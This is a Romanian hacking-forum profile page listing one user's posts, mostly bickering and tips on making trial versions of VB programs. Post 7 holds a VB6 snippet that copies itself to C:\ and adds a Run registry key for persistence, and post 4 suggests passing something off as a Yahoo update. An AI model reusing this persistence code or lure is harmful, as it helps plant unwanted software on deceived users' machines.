Jump to content

wtf.php

Members
  • Posts

    36
  • Joined

  • Last visited

Converted

  • Biography
    no.
  • Location
    home
  • Occupation
    no.

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

wtf.php's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. wtf.php

    Curiozitate...

    mai sigura in ce sens?eu iti recomand un vpn
  2. wtf.php

    2 Conturi RS

    care e rostu injuraturilor?puteai sa spui "nu schimbati parola".dar mai bine pui o injuratura sa arati ca "stii".si daca chiar nu vroiai sa iti schimbe cineva parola nu le postai
  3. cele mai folosite cuvinte : gay,gayzor,prost,mata,ratat,muie,fuck,etc(cel putin in ultimul timp astea predomina).nu cred ca asa ceva ar trebuii sa predomine pe un forum de genul asta,faceti-va un forum si luati-va injuraturile cu voi. ps. stiu ca o sa incepeti sa va luati de mine,ca eu nu fac nimic pe forumu asta si n-am dreptul sa zic de voi dar nu-mi pasa
  4. ii zici ca e update automat de la yahoo.
  5. gata,a mers pentru ceva timp acuma : You don't have permission to access /scripts/downloaded/localroot/ on this server.
  6. au lasat cei de pe h4cky0u un mesaj pe h4cky0u1 ca e doar o copie facuta cu baza de date publicata de don.
  7. Private Sub Form_Load() FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\fiserutau.exe" Dim RegKey Set RegKey = CreateObject("WScript.Shell") RegKey.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UrApp", "C:\fiserutau.exe" End Sub
  8. eh,in locul tau nu as deschide gura,daca ma uit la ce ai facut pe forum,numai posturi de calitate.dar,nu are rost sa ma cert cu nimeni,mai ales cu tine,pentru ca nu-mi pasa de tine si nu iti dau sansa sa mai faci un post de rahat aici.
  9. sysgh0st are dreptate.va plangeti ca nu sunt posturi de calitate.daca nu sunt de ce nu faceti voi?asa isi zic toti:"de ce nu sunt posturi de calitate?" dar nimeni nu ia masura "hai ba sa fac si io un post de calitate nu sa astept dupa altii sa faca".
  10. fa-l sa se stearga dupa ce il inchizi. am gasit aici un tutorial despre limitarea timpului de utilizare.poate te ajuta : http://en.allexperts.com/q/Visual-Basic-1048/30-days-trial-package.htm exemplu cum sa faci un trial : http://www.freevbcode.com/ShowCode.asp?ID=620
  11. atunci restrictioneaza anumite functii ale programului.fai sa se afiseze decat dupa ce utilizatorul introduce un cod.de exemplu daca codul este valid sa ii afisezi formul cu toate functiile.
  12. demo = versiune de demonstratie,depinde la ce vrei sa faci demo.fai ca dupa un anumit timp sa se inchida form-ul daca e un program ceva sau sa nu poata folosii anumite functii,sau daca e un joc fai doar un stagiu.etc.
  13. eu cred ca adevarata intrebare e : stii sa explici? si...crezi ca topicul tau apartine "Programe H4ck" ?eu nu.eu cred ca "Cosul de gunoi" e cel mai potrivit.
×
×
  • Create New...